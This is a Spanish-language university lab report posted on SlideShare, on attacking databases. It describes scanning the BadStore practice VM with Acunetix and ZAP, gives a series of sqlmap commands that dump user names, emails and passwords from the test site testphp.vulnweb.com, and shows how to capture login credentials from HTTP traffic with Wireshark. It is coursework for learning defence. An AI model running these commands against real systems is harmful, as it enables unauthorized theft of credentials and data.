SlideShare una empresa de Scribd logo
1 de 39
ATAQUES A BASES DE 
DATOS 
Componente Práctico 1 
Arnulfo Fernando Hernández Daza 
Seguridad en bases de datos, Universidad Nacional Abierta y a Distancia-UNAD 
Tauramena, Colombia
1. ATAQUE POR INYECCION DE CODIGO 
SQL BASE DE DATOS BADSTORE 
 Lo primero que hacemos es instalar la base de datos en una máquina virtual; en 
este caso utilizamos VMware.
 Para vulnerar la base de datos de Badstore utilizaremos Acunetix y Zed 
attack proxy. Instalamos y configuramos entonces OWASP Zed.
 Configuro en mi navegador el proxy para enlazar las busquedas del 
navegador con OWAS ZAP:
En la carpeta de instalacion de OWAS ZAP, busco el archivo Config, y en la linea 
del hostname establesco el mismo host que configure en el proxy del navegador: 
127.0.0.1
Descargamos e instalamos Acunetix para poder detectar las vulnerabilidades de 
Badstore.
Procedemos a la configuración de Acunetix: 
Aquí le indico a acunetix la dirección que quiero que escanee en busca de 
vulnerabilidades, es este caso será la dirección de Badstore, 
http://192.168.204.130/.
Y como se puede observar en la imagen siguiente, se comienza el escaneo de las 
vulnerabilidades de Badstore con acunetix:
Mientras se termina el escaneo podemos probar sobre un error hallado, el cross 
site scripting de la siguiente manera:
Ahora volvemos a Zed Attack y habilitamos el escaneo de badstore:
Identificamos una amenaza para atacar:
Aplico un Fuzz a la direccion vulnerable del sitio:
Configuro el Fuzz:
Podemos observar la informacion de algunos clientes:
2. ATAQUE CON INYECCIÓN DE CÓDIGO SQL A 
SITIO WEB http://testphp.vulnweb.com/. 
Procedemos a instalar Python:
Copiamos la carpeta de sqlmap en el disco donde 
está instalado Python
Desde la ventana de símbolo de sistema accedemos a 
la carpeta que contiene los archivos sqlmap y 
ejecutamos el comando para obtener la información 
de la base de datos del sitio de BadStore: 
> color f4 
> cd sqlmap
Para obtener información de la base de datos 
buscamos primero una vulnerabilidad en la página 
digitando el código = al final de la dirección y 
observando el erros en la sintaxis de SQL.
Cuando tenemos la vulnerabilidad entonces digitamos el siguiente código 
para obtener información: 
Sqlmap.py –u http://testphp.vulnweb.com/listproducts.php?cat=2 --dbs
Ahora buscamos informacion en la pagina. Averiguamos que base de datos utiliza 
el sitio: 
Sqlmap.py –u http://testphp.vulnweb.com/listproducts.php?cat=2 –current-db
Ahora buscaremos la información correspondiente a las tablas que muestra la 
base de datos: 
Sqlmap.py –u http://testphp.vulnweb.com/listproducts.php?cat=2 –D acuart – 
tables
Ahora busquemos la informacion de las columnas de las tablas: 
Sqlmap.py –u http://testphp.vulnweb.com/listproducts.php?cat=2 –D acuart -- 
columns
Ahora podemos averiguar los datos de alguna columna de la tabla users, con el 
siguiente codigo: 
Sqlmap.py –u http://testphp.vulnweb.com/listproducts.php?cat=2 –D acuart -- 
columns –T users –C name
Extraemos el contenido: 
Sqlmap.py –u http://testphp.vulnweb.com/listproducts.php?cat=2 –D acuart -- 
columns –T users –C name –dump
Averiguamos el correo: 
Sqlmap.py –u http://testphp.vulnweb.com/listproducts.php?cat=2 –D acuart -- 
columns –T users –C email –dump
Busquemos la contraseña: 
Sqlmap.py –u http://testphp.vulnweb.com/listproducts.php?cat=2 –D acuart -- 
columns –T users –C pass –dump
Ahora el usuario: 
Sqlmap.py –u http://testphp.vulnweb.com/listproducts.php?cat=2 –D acuart -- 
columns –T users –C uname –dump
Ahora hagamos una prueba con los datos obtenidos del ataque en la pagina y 
verificamos que los datos obtenidos son reales:
3. ATAQUE POR SNIFFING 
 Para el ataque por sniffing utilizaremos el software de Wireshark. 
 Descargamos e instalamos en nuestro equipo el software:
Una vez instalado el software de Wireshark procedemos a configurarlo y 
utilizarlo para nuestro análisis:
 Abrimos el menu Capture, damos clic en opciones y seleccionanos 
nuestra tarjeta de red y le damos iniciar escaneo de red:
 De esta forma se incia el escaneo del trafico en la red:
 Ahora accederemos a una cuenta en un sitio web sin seguridad, de tipo 
http; en este caso utilizaremos una cuenta de www.directoriow.com:
 Una vez logueados en el sitio con nuestros datos procedemos a usar 
Wireshark. Lo primero es dar clic en el botón Expression y escoger la 
opción HTTP – Hypertext transfer protocolo.
 Dentro del menú de opciones damos clic en http.request.method.
 Luego de esto buscamos la ip que destino que corresponde al sitio 
de www.directorio.com, que en este caso es 95.211.231.44.
 Una vez identificada la ip podermos filtrar todo el trafico 
correspondiente a este sitio con el comando ip.addr==95.211.231.44.
 Cuando tengamos filtrado el trafico del sitio, buscamos la línea que contiene el login? del 
usuario que utilizamos y en la ventana inferior en la opción de HTML Form URL Encoded 
podemos encontrar la información de usurario y contraseña que estamos buscando.
REFERENCIAS 
 Recuperado: 
 https://www.youtube.com/watch?v=-C9TEBIfyrg 
 
 Recuperado: 
 http://rootear.com/seguridad/utilizando-sqlma 
 
 Recuperado: 
 https://www.youtube.com/watch?v=OPhqJTBGZsw 
 
 Recuperado: 
 http://www.hacktimes.com/sql_injection_con_sqlmap/

Más contenido relacionado

La actualidad más candente

network monitoring system ppt
network monitoring system pptnetwork monitoring system ppt
network monitoring system pptashutosh rai
 
Log4Shell Case Study - Suricon2022.pdf
Log4Shell Case Study - Suricon2022.pdfLog4Shell Case Study - Suricon2022.pdf
Log4Shell Case Study - Suricon2022.pdfBrandon DeVault
 
Network Packet Analysis with Wireshark
Network Packet Analysis with WiresharkNetwork Packet Analysis with Wireshark
Network Packet Analysis with WiresharkJim Gilsinn
 
Running an app sec program with OWASP projects_ Defcon AppSec Village
Running an app sec program with OWASP projects_ Defcon AppSec VillageRunning an app sec program with OWASP projects_ Defcon AppSec Village
Running an app sec program with OWASP projects_ Defcon AppSec VillageVandana Verma
 
Lenguajes de trazabilidad expresiones regulares
Lenguajes de trazabilidad expresiones regularesLenguajes de trazabilidad expresiones regulares
Lenguajes de trazabilidad expresiones regularesGiovani Ramirez
 
How Hack WiFi through Aircrack-ng in Kali Linux Cyber Security
How Hack WiFi through Aircrack-ng in Kali Linux Cyber SecurityHow Hack WiFi through Aircrack-ng in Kali Linux Cyber Security
How Hack WiFi through Aircrack-ng in Kali Linux Cyber SecurityAhmad Yar
 
Bypassing nac solutions and mitigations
Bypassing nac solutions and mitigationsBypassing nac solutions and mitigations
Bypassing nac solutions and mitigationsSuraj Khetani
 
CompTIA CySA+ certification (CS0-003) changes: Everything you need to know
CompTIA CySA+ certification (CS0-003) changes: Everything you need to knowCompTIA CySA+ certification (CS0-003) changes: Everything you need to know
CompTIA CySA+ certification (CS0-003) changes: Everything you need to knowInfosec
 
Penetration testing
Penetration testingPenetration testing
Penetration testingAmmar WK
 
Nmap(network mapping)
Nmap(network mapping)Nmap(network mapping)
Nmap(network mapping)shwetha mk
 
Wireshark Inroduction Li In
Wireshark Inroduction  Li InWireshark Inroduction  Li In
Wireshark Inroduction Li Inmhaviv
 
Analysis of web application penetration testing
Analysis of web application penetration testingAnalysis of web application penetration testing
Analysis of web application penetration testingEngr Md Yusuf Miah
 

La actualidad más candente (20)

Burp suite
Burp suiteBurp suite
Burp suite
 
Security Testing for Web Application
Security Testing for Web ApplicationSecurity Testing for Web Application
Security Testing for Web Application
 
Vulnerability Assessment Report
Vulnerability Assessment ReportVulnerability Assessment Report
Vulnerability Assessment Report
 
network monitoring system ppt
network monitoring system pptnetwork monitoring system ppt
network monitoring system ppt
 
Log4Shell Case Study - Suricon2022.pdf
Log4Shell Case Study - Suricon2022.pdfLog4Shell Case Study - Suricon2022.pdf
Log4Shell Case Study - Suricon2022.pdf
 
Nmap
NmapNmap
Nmap
 
Sqlmap
SqlmapSqlmap
Sqlmap
 
Network Packet Analysis with Wireshark
Network Packet Analysis with WiresharkNetwork Packet Analysis with Wireshark
Network Packet Analysis with Wireshark
 
Running an app sec program with OWASP projects_ Defcon AppSec Village
Running an app sec program with OWASP projects_ Defcon AppSec VillageRunning an app sec program with OWASP projects_ Defcon AppSec Village
Running an app sec program with OWASP projects_ Defcon AppSec Village
 
Aircrack
AircrackAircrack
Aircrack
 
Lenguajes de trazabilidad expresiones regulares
Lenguajes de trazabilidad expresiones regularesLenguajes de trazabilidad expresiones regulares
Lenguajes de trazabilidad expresiones regulares
 
How Hack WiFi through Aircrack-ng in Kali Linux Cyber Security
How Hack WiFi through Aircrack-ng in Kali Linux Cyber SecurityHow Hack WiFi through Aircrack-ng in Kali Linux Cyber Security
How Hack WiFi through Aircrack-ng in Kali Linux Cyber Security
 
Bypassing nac solutions and mitigations
Bypassing nac solutions and mitigationsBypassing nac solutions and mitigations
Bypassing nac solutions and mitigations
 
CompTIA CySA+ certification (CS0-003) changes: Everything you need to know
CompTIA CySA+ certification (CS0-003) changes: Everything you need to knowCompTIA CySA+ certification (CS0-003) changes: Everything you need to know
CompTIA CySA+ certification (CS0-003) changes: Everything you need to know
 
3.5 Nessus
3.5 Nessus3.5 Nessus
3.5 Nessus
 
Penetration testing
Penetration testingPenetration testing
Penetration testing
 
Nmap(network mapping)
Nmap(network mapping)Nmap(network mapping)
Nmap(network mapping)
 
Wireshark Inroduction Li In
Wireshark Inroduction  Li InWireshark Inroduction  Li In
Wireshark Inroduction Li In
 
Packets never lie: An in-depth overview of 802.11 frames
Packets never lie: An in-depth overview of 802.11 framesPackets never lie: An in-depth overview of 802.11 frames
Packets never lie: An in-depth overview of 802.11 frames
 
Analysis of web application penetration testing
Analysis of web application penetration testingAnalysis of web application penetration testing
Analysis of web application penetration testing
 

Destacado

Mesa Redonda: Smart Communities. Smart Cities
Mesa Redonda: Smart Communities. Smart CitiesMesa Redonda: Smart Communities. Smart Cities
Mesa Redonda: Smart Communities. Smart CitiesAMETIC
 
Juan Cristobal Martinez
Juan Cristobal MartinezJuan Cristobal Martinez
Juan Cristobal Martinezpilitacp
 
Rapport LAMBERT - MALVY. Finances publiques locales maîtrisées
Rapport LAMBERT - MALVY. Finances publiques locales maîtriséesRapport LAMBERT - MALVY. Finances publiques locales maîtrisées
Rapport LAMBERT - MALVY. Finances publiques locales maîtriséespascaljan
 
L’agriculture familiale pour la sécurité alimentaire et nutritionnelle au sud...
L’agriculture familiale pour la sécurité alimentaire et nutritionnelle au sud...L’agriculture familiale pour la sécurité alimentaire et nutritionnelle au sud...
L’agriculture familiale pour la sécurité alimentaire et nutritionnelle au sud...Fatimata Kone
 
Présentation petit déjeuner fev2014 extraits
Présentation petit déjeuner fev2014 extraitsPrésentation petit déjeuner fev2014 extraits
Présentation petit déjeuner fev2014 extraitsElisabethBDO
 
Sr 253 fit 2- vnn 17 -fer 13 modification (ban chuan )
Sr 253  fit 2- vnn 17 -fer 13 modification (ban chuan )Sr 253  fit 2- vnn 17 -fer 13 modification (ban chuan )
Sr 253 fit 2- vnn 17 -fer 13 modification (ban chuan )tourtt
 
Joyeux Anniversaire!!!!
Joyeux Anniversaire!!!! Joyeux Anniversaire!!!!
Joyeux Anniversaire!!!! sandyhoyos_19
 
Court circuiter le monde
Court circuiter le mondeCourt circuiter le monde
Court circuiter le mondeouicar
 
Google analytics LAMKIRICH Asma
Google analytics LAMKIRICH AsmaGoogle analytics LAMKIRICH Asma
Google analytics LAMKIRICH AsmaAsy Lach
 
Ponencia Afsmi Un Mundo De Servicios en III Foro SSME ( Services Science Mana...
Ponencia Afsmi Un Mundo De Servicios en III Foro SSME ( Services Science Mana...Ponencia Afsmi Un Mundo De Servicios en III Foro SSME ( Services Science Mana...
Ponencia Afsmi Un Mundo De Servicios en III Foro SSME ( Services Science Mana...Universidad Internacional Menendez Pelayo
 
Instituto Politecnico MonseñOr Manuel Sorzano Gonzalez
Instituto Politecnico MonseñOr Manuel Sorzano GonzalezInstituto Politecnico MonseñOr Manuel Sorzano Gonzalez
Instituto Politecnico MonseñOr Manuel Sorzano Gonzalezpilitacp
 
Nador a Vic: Mostra d'itineraris personals
Nador a Vic: Mostra d'itineraris personalsNador a Vic: Mostra d'itineraris personals
Nador a Vic: Mostra d'itineraris personalsmllort2
 
Le luxe en periode de crise
Le luxe en periode de criseLe luxe en periode de crise
Le luxe en periode de criseVictoire LO
 
Christmas show 2014
Christmas show 2014 Christmas show 2014
Christmas show 2014 jbbalan22
 
Salidad De Monteria Hacia Sahagun 2
Salidad De Monteria Hacia Sahagun 2Salidad De Monteria Hacia Sahagun 2
Salidad De Monteria Hacia Sahagun 2Yamid Murillo
 

Destacado (20)

Mesa Redonda: Smart Communities. Smart Cities
Mesa Redonda: Smart Communities. Smart CitiesMesa Redonda: Smart Communities. Smart Cities
Mesa Redonda: Smart Communities. Smart Cities
 
Juan Cristobal Martinez
Juan Cristobal MartinezJuan Cristobal Martinez
Juan Cristobal Martinez
 
FinanciacióN De La InnovacióN
FinanciacióN De La InnovacióNFinanciacióN De La InnovacióN
FinanciacióN De La InnovacióN
 
4.tic sante atelierh2020-frs consulting-10sept15
4.tic sante atelierh2020-frs consulting-10sept154.tic sante atelierh2020-frs consulting-10sept15
4.tic sante atelierh2020-frs consulting-10sept15
 
Rapport LAMBERT - MALVY. Finances publiques locales maîtrisées
Rapport LAMBERT - MALVY. Finances publiques locales maîtriséesRapport LAMBERT - MALVY. Finances publiques locales maîtrisées
Rapport LAMBERT - MALVY. Finances publiques locales maîtrisées
 
L’agriculture familiale pour la sécurité alimentaire et nutritionnelle au sud...
L’agriculture familiale pour la sécurité alimentaire et nutritionnelle au sud...L’agriculture familiale pour la sécurité alimentaire et nutritionnelle au sud...
L’agriculture familiale pour la sécurité alimentaire et nutritionnelle au sud...
 
Présentation petit déjeuner fev2014 extraits
Présentation petit déjeuner fev2014 extraitsPrésentation petit déjeuner fev2014 extraits
Présentation petit déjeuner fev2014 extraits
 
Sr 253 fit 2- vnn 17 -fer 13 modification (ban chuan )
Sr 253  fit 2- vnn 17 -fer 13 modification (ban chuan )Sr 253  fit 2- vnn 17 -fer 13 modification (ban chuan )
Sr 253 fit 2- vnn 17 -fer 13 modification (ban chuan )
 
Joyeux Anniversaire!!!!
Joyeux Anniversaire!!!! Joyeux Anniversaire!!!!
Joyeux Anniversaire!!!!
 
Court circuiter le monde
Court circuiter le mondeCourt circuiter le monde
Court circuiter le monde
 
Google analytics LAMKIRICH Asma
Google analytics LAMKIRICH AsmaGoogle analytics LAMKIRICH Asma
Google analytics LAMKIRICH Asma
 
Ponencia Afsmi Un Mundo De Servicios en III Foro SSME ( Services Science Mana...
Ponencia Afsmi Un Mundo De Servicios en III Foro SSME ( Services Science Mana...Ponencia Afsmi Un Mundo De Servicios en III Foro SSME ( Services Science Mana...
Ponencia Afsmi Un Mundo De Servicios en III Foro SSME ( Services Science Mana...
 
Instituto Politecnico MonseñOr Manuel Sorzano Gonzalez
Instituto Politecnico MonseñOr Manuel Sorzano GonzalezInstituto Politecnico MonseñOr Manuel Sorzano Gonzalez
Instituto Politecnico MonseñOr Manuel Sorzano Gonzalez
 
Verre isolant
Verre isolantVerre isolant
Verre isolant
 
Nador a Vic: Mostra d'itineraris personals
Nador a Vic: Mostra d'itineraris personalsNador a Vic: Mostra d'itineraris personals
Nador a Vic: Mostra d'itineraris personals
 
CTE PRIMARIA PRIMERA SESION 2014
CTE PRIMARIA PRIMERA SESION 2014CTE PRIMARIA PRIMERA SESION 2014
CTE PRIMARIA PRIMERA SESION 2014
 
Le luxe en periode de crise
Le luxe en periode de criseLe luxe en periode de crise
Le luxe en periode de crise
 
Christmas show 2014
Christmas show 2014 Christmas show 2014
Christmas show 2014
 
Triangle
TriangleTriangle
Triangle
 
Salidad De Monteria Hacia Sahagun 2
Salidad De Monteria Hacia Sahagun 2Salidad De Monteria Hacia Sahagun 2
Salidad De Monteria Hacia Sahagun 2
 

Similar a Bases de datos ataques SQL inyección sniffing

Similar a Bases de datos ataques SQL inyección sniffing (20)

Ataque por inyección de código sql y sniffing
Ataque por inyección de código sql y sniffingAtaque por inyección de código sql y sniffing
Ataque por inyección de código sql y sniffing
 
Team.docx
Team.docxTeam.docx
Team.docx
 
Practica 1 seguridad en bases de datos
Practica 1 seguridad en bases de datosPractica 1 seguridad en bases de datos
Practica 1 seguridad en bases de datos
 
Ataque sql web
Ataque sql webAtaque sql web
Ataque sql web
 
ATAQUES POR INYECCIÓN DE CÓDIGO SQL Y SNIFFING
ATAQUES POR INYECCIÓN DE CÓDIGO SQL Y SNIFFINGATAQUES POR INYECCIÓN DE CÓDIGO SQL Y SNIFFING
ATAQUES POR INYECCIÓN DE CÓDIGO SQL Y SNIFFING
 
Proyecto 6
Proyecto 6Proyecto 6
Proyecto 6
 
Present3
Present3Present3
Present3
 
M2 com practico_arodri
M2 com practico_arodriM2 com practico_arodri
M2 com practico_arodri
 
Maitaining access
Maitaining accessMaitaining access
Maitaining access
 
MAITAINING ACCESS
MAITAINING ACCESSMAITAINING ACCESS
MAITAINING ACCESS
 
Ataque con inyeccion de codigo sql a sitio web
Ataque con inyeccion de codigo sql a sitio webAtaque con inyeccion de codigo sql a sitio web
Ataque con inyeccion de codigo sql a sitio web
 
Hacking ético [Pentest]
Hacking ético [Pentest]Hacking ético [Pentest]
Hacking ético [Pentest]
 
VULNERABILITY ASSESSMENT AND EXPLOITATION
VULNERABILITY ASSESSMENT AND EXPLOITATIONVULNERABILITY ASSESSMENT AND EXPLOITATION
VULNERABILITY ASSESSMENT AND EXPLOITATION
 
Vulnerability assessment and exploitation
Vulnerability assessment and exploitationVulnerability assessment and exploitation
Vulnerability assessment and exploitation
 
Labs
LabsLabs
Labs
 
Taller
TallerTaller
Taller
 
STIC XV CCN-CERT - Cibervigilancia con warrior (Ivan Portillo y Wiktor Nykiel)
STIC XV CCN-CERT - Cibervigilancia con warrior (Ivan Portillo y Wiktor Nykiel)STIC XV CCN-CERT - Cibervigilancia con warrior (Ivan Portillo y Wiktor Nykiel)
STIC XV CCN-CERT - Cibervigilancia con warrior (Ivan Portillo y Wiktor Nykiel)
 
Internal.docx
Internal.docxInternal.docx
Internal.docx
 
Proyecto 6
Proyecto 6Proyecto 6
Proyecto 6
 
Manual de instalacion de un servidor proxy
Manual de instalacion de un servidor proxyManual de instalacion de un servidor proxy
Manual de instalacion de un servidor proxy
 

Último

Historia de la Arquitectura II, 1era actividad..pdf
Historia de la Arquitectura II, 1era actividad..pdfHistoria de la Arquitectura II, 1era actividad..pdf
Historia de la Arquitectura II, 1era actividad..pdfIsbelRodrguez
 
ESTRUCTURAS EN LA SUPERVISIÓN Y RESIDENCIA DE OBRAS
ESTRUCTURAS EN LA SUPERVISIÓN Y RESIDENCIA DE OBRASESTRUCTURAS EN LA SUPERVISIÓN Y RESIDENCIA DE OBRAS
ESTRUCTURAS EN LA SUPERVISIÓN Y RESIDENCIA DE OBRASenriquezerly87
 
trabajos en altura 2024, sistemas de contencion anticaidas
trabajos en altura 2024, sistemas de contencion anticaidastrabajos en altura 2024, sistemas de contencion anticaidas
trabajos en altura 2024, sistemas de contencion anticaidasNelsonQuispeQuispitu
 
NOM-002-STPS-2010, combate contra incendio.pptx
NOM-002-STPS-2010, combate contra incendio.pptxNOM-002-STPS-2010, combate contra incendio.pptx
NOM-002-STPS-2010, combate contra incendio.pptxJairReyna1
 
Hanns Recabarren Diaz (2024), Implementación de una herramienta de realidad v...
Hanns Recabarren Diaz (2024), Implementación de una herramienta de realidad v...Hanns Recabarren Diaz (2024), Implementación de una herramienta de realidad v...
Hanns Recabarren Diaz (2024), Implementación de una herramienta de realidad v...Francisco Javier Mora Serrano
 
Conservatorio de danza Kina Jiménez de Almería
Conservatorio de danza Kina Jiménez de AlmeríaConservatorio de danza Kina Jiménez de Almería
Conservatorio de danza Kina Jiménez de AlmeríaANDECE
 
CONSTRUCCIONES II - SEMANA 01 - REGLAMENTO NACIONAL DE EDIFICACIONES.pdf
CONSTRUCCIONES II - SEMANA 01 - REGLAMENTO NACIONAL DE EDIFICACIONES.pdfCONSTRUCCIONES II - SEMANA 01 - REGLAMENTO NACIONAL DE EDIFICACIONES.pdf
CONSTRUCCIONES II - SEMANA 01 - REGLAMENTO NACIONAL DE EDIFICACIONES.pdfErikNivor
 
4.3 Subestaciones eléctricas tipos caracteristicas.pptx
4.3 Subestaciones eléctricas tipos caracteristicas.pptx4.3 Subestaciones eléctricas tipos caracteristicas.pptx
4.3 Subestaciones eléctricas tipos caracteristicas.pptxEfrain Yungan
 
Trabajo en altura de acuerdo a la normativa peruana
Trabajo en altura de acuerdo a la normativa peruanaTrabajo en altura de acuerdo a la normativa peruana
Trabajo en altura de acuerdo a la normativa peruana5extraviado
 
Estacionamientos, Existen 3 tipos, y tienen diferentes ángulos de inclinación
Estacionamientos, Existen 3 tipos, y tienen diferentes ángulos de inclinaciónEstacionamientos, Existen 3 tipos, y tienen diferentes ángulos de inclinación
Estacionamientos, Existen 3 tipos, y tienen diferentes ángulos de inclinaciónAlexisHernandez885688
 
Topografía 1 Nivelación y Carretera en la Ingenierías
Topografía 1 Nivelación y Carretera en la IngenieríasTopografía 1 Nivelación y Carretera en la Ingenierías
Topografía 1 Nivelación y Carretera en la IngenieríasSegundo Silva Maguiña
 
S454444444444444444_CONTROL_SET_A_GEOMN1204.pdf
S454444444444444444_CONTROL_SET_A_GEOMN1204.pdfS454444444444444444_CONTROL_SET_A_GEOMN1204.pdf
S454444444444444444_CONTROL_SET_A_GEOMN1204.pdffredyflores58
 
4.3 Subestaciones eléctricas componentes principales .pptx
4.3 Subestaciones eléctricas componentes principales .pptx4.3 Subestaciones eléctricas componentes principales .pptx
4.3 Subestaciones eléctricas componentes principales .pptxEfrain Yungan
 
QUIMICA ORGANICA I ENOLES Y ENAMINAS LIBR
QUIMICA ORGANICA I ENOLES Y ENAMINAS LIBRQUIMICA ORGANICA I ENOLES Y ENAMINAS LIBR
QUIMICA ORGANICA I ENOLES Y ENAMINAS LIBRyanimarca23
 
Simbología de Soldadura, interpretacion y aplicacion en dibujo tecnico indus...
Simbología de Soldadura,  interpretacion y aplicacion en dibujo tecnico indus...Simbología de Soldadura,  interpretacion y aplicacion en dibujo tecnico indus...
Simbología de Soldadura, interpretacion y aplicacion en dibujo tecnico indus...esandoval7
 
I LINEAMIENTOS Y CRITERIOS DE INFRAESTRUCTURA DE RIEGO.pptx
I LINEAMIENTOS Y CRITERIOS DE INFRAESTRUCTURA DE RIEGO.pptxI LINEAMIENTOS Y CRITERIOS DE INFRAESTRUCTURA DE RIEGO.pptx
I LINEAMIENTOS Y CRITERIOS DE INFRAESTRUCTURA DE RIEGO.pptxPATRICIAKARIMESTELAL
 
AMBIENTES SEDIMENTARIOS GEOLOGIA TIPOS .pptx
AMBIENTES SEDIMENTARIOS GEOLOGIA TIPOS .pptxAMBIENTES SEDIMENTARIOS GEOLOGIA TIPOS .pptx
AMBIENTES SEDIMENTARIOS GEOLOGIA TIPOS .pptxLuisvila35
 
VIRUS FITOPATÓGENOS (GENERALIDADES EN PLANTAS)
VIRUS FITOPATÓGENOS (GENERALIDADES EN PLANTAS)VIRUS FITOPATÓGENOS (GENERALIDADES EN PLANTAS)
VIRUS FITOPATÓGENOS (GENERALIDADES EN PLANTAS)ssuser6958b11
 
SEMANA 6 MEDIDAS DE TENDENCIA CENTRAL.pdf
SEMANA  6 MEDIDAS DE TENDENCIA CENTRAL.pdfSEMANA  6 MEDIDAS DE TENDENCIA CENTRAL.pdf
SEMANA 6 MEDIDAS DE TENDENCIA CENTRAL.pdffredyflores58
 

Último (20)

Historia de la Arquitectura II, 1era actividad..pdf
Historia de la Arquitectura II, 1era actividad..pdfHistoria de la Arquitectura II, 1era actividad..pdf
Historia de la Arquitectura II, 1era actividad..pdf
 
ESTRUCTURAS EN LA SUPERVISIÓN Y RESIDENCIA DE OBRAS
ESTRUCTURAS EN LA SUPERVISIÓN Y RESIDENCIA DE OBRASESTRUCTURAS EN LA SUPERVISIÓN Y RESIDENCIA DE OBRAS
ESTRUCTURAS EN LA SUPERVISIÓN Y RESIDENCIA DE OBRAS
 
trabajos en altura 2024, sistemas de contencion anticaidas
trabajos en altura 2024, sistemas de contencion anticaidastrabajos en altura 2024, sistemas de contencion anticaidas
trabajos en altura 2024, sistemas de contencion anticaidas
 
NOM-002-STPS-2010, combate contra incendio.pptx
NOM-002-STPS-2010, combate contra incendio.pptxNOM-002-STPS-2010, combate contra incendio.pptx
NOM-002-STPS-2010, combate contra incendio.pptx
 
Hanns Recabarren Diaz (2024), Implementación de una herramienta de realidad v...
Hanns Recabarren Diaz (2024), Implementación de una herramienta de realidad v...Hanns Recabarren Diaz (2024), Implementación de una herramienta de realidad v...
Hanns Recabarren Diaz (2024), Implementación de una herramienta de realidad v...
 
Conservatorio de danza Kina Jiménez de Almería
Conservatorio de danza Kina Jiménez de AlmeríaConservatorio de danza Kina Jiménez de Almería
Conservatorio de danza Kina Jiménez de Almería
 
CONSTRUCCIONES II - SEMANA 01 - REGLAMENTO NACIONAL DE EDIFICACIONES.pdf
CONSTRUCCIONES II - SEMANA 01 - REGLAMENTO NACIONAL DE EDIFICACIONES.pdfCONSTRUCCIONES II - SEMANA 01 - REGLAMENTO NACIONAL DE EDIFICACIONES.pdf
CONSTRUCCIONES II - SEMANA 01 - REGLAMENTO NACIONAL DE EDIFICACIONES.pdf
 
4.3 Subestaciones eléctricas tipos caracteristicas.pptx
4.3 Subestaciones eléctricas tipos caracteristicas.pptx4.3 Subestaciones eléctricas tipos caracteristicas.pptx
4.3 Subestaciones eléctricas tipos caracteristicas.pptx
 
Trabajo en altura de acuerdo a la normativa peruana
Trabajo en altura de acuerdo a la normativa peruanaTrabajo en altura de acuerdo a la normativa peruana
Trabajo en altura de acuerdo a la normativa peruana
 
Estacionamientos, Existen 3 tipos, y tienen diferentes ángulos de inclinación
Estacionamientos, Existen 3 tipos, y tienen diferentes ángulos de inclinaciónEstacionamientos, Existen 3 tipos, y tienen diferentes ángulos de inclinación
Estacionamientos, Existen 3 tipos, y tienen diferentes ángulos de inclinación
 
Topografía 1 Nivelación y Carretera en la Ingenierías
Topografía 1 Nivelación y Carretera en la IngenieríasTopografía 1 Nivelación y Carretera en la Ingenierías
Topografía 1 Nivelación y Carretera en la Ingenierías
 
S454444444444444444_CONTROL_SET_A_GEOMN1204.pdf
S454444444444444444_CONTROL_SET_A_GEOMN1204.pdfS454444444444444444_CONTROL_SET_A_GEOMN1204.pdf
S454444444444444444_CONTROL_SET_A_GEOMN1204.pdf
 
4.3 Subestaciones eléctricas componentes principales .pptx
4.3 Subestaciones eléctricas componentes principales .pptx4.3 Subestaciones eléctricas componentes principales .pptx
4.3 Subestaciones eléctricas componentes principales .pptx
 
presentación manipulación manual de cargas sunafil
presentación manipulación manual de cargas sunafilpresentación manipulación manual de cargas sunafil
presentación manipulación manual de cargas sunafil
 
QUIMICA ORGANICA I ENOLES Y ENAMINAS LIBR
QUIMICA ORGANICA I ENOLES Y ENAMINAS LIBRQUIMICA ORGANICA I ENOLES Y ENAMINAS LIBR
QUIMICA ORGANICA I ENOLES Y ENAMINAS LIBR
 
Simbología de Soldadura, interpretacion y aplicacion en dibujo tecnico indus...
Simbología de Soldadura,  interpretacion y aplicacion en dibujo tecnico indus...Simbología de Soldadura,  interpretacion y aplicacion en dibujo tecnico indus...
Simbología de Soldadura, interpretacion y aplicacion en dibujo tecnico indus...
 
I LINEAMIENTOS Y CRITERIOS DE INFRAESTRUCTURA DE RIEGO.pptx
I LINEAMIENTOS Y CRITERIOS DE INFRAESTRUCTURA DE RIEGO.pptxI LINEAMIENTOS Y CRITERIOS DE INFRAESTRUCTURA DE RIEGO.pptx
I LINEAMIENTOS Y CRITERIOS DE INFRAESTRUCTURA DE RIEGO.pptx
 
AMBIENTES SEDIMENTARIOS GEOLOGIA TIPOS .pptx
AMBIENTES SEDIMENTARIOS GEOLOGIA TIPOS .pptxAMBIENTES SEDIMENTARIOS GEOLOGIA TIPOS .pptx
AMBIENTES SEDIMENTARIOS GEOLOGIA TIPOS .pptx
 
VIRUS FITOPATÓGENOS (GENERALIDADES EN PLANTAS)
VIRUS FITOPATÓGENOS (GENERALIDADES EN PLANTAS)VIRUS FITOPATÓGENOS (GENERALIDADES EN PLANTAS)
VIRUS FITOPATÓGENOS (GENERALIDADES EN PLANTAS)
 
SEMANA 6 MEDIDAS DE TENDENCIA CENTRAL.pdf
SEMANA  6 MEDIDAS DE TENDENCIA CENTRAL.pdfSEMANA  6 MEDIDAS DE TENDENCIA CENTRAL.pdf
SEMANA 6 MEDIDAS DE TENDENCIA CENTRAL.pdf
 

Bases de datos ataques SQL inyección sniffing

  • 1. ATAQUES A BASES DE DATOS Componente Práctico 1 Arnulfo Fernando Hernández Daza Seguridad en bases de datos, Universidad Nacional Abierta y a Distancia-UNAD Tauramena, Colombia
  • 2. 1. ATAQUE POR INYECCION DE CODIGO SQL BASE DE DATOS BADSTORE  Lo primero que hacemos es instalar la base de datos en una máquina virtual; en este caso utilizamos VMware.
  • 3.  Para vulnerar la base de datos de Badstore utilizaremos Acunetix y Zed attack proxy. Instalamos y configuramos entonces OWASP Zed.
  • 4.  Configuro en mi navegador el proxy para enlazar las busquedas del navegador con OWAS ZAP:
  • 5. En la carpeta de instalacion de OWAS ZAP, busco el archivo Config, y en la linea del hostname establesco el mismo host que configure en el proxy del navegador: 127.0.0.1
  • 6. Descargamos e instalamos Acunetix para poder detectar las vulnerabilidades de Badstore.
  • 7. Procedemos a la configuración de Acunetix: Aquí le indico a acunetix la dirección que quiero que escanee en busca de vulnerabilidades, es este caso será la dirección de Badstore, http://192.168.204.130/.
  • 8. Y como se puede observar en la imagen siguiente, se comienza el escaneo de las vulnerabilidades de Badstore con acunetix:
  • 9. Mientras se termina el escaneo podemos probar sobre un error hallado, el cross site scripting de la siguiente manera:
  • 10. Ahora volvemos a Zed Attack y habilitamos el escaneo de badstore:
  • 12. Aplico un Fuzz a la direccion vulnerable del sitio:
  • 14. Podemos observar la informacion de algunos clientes:
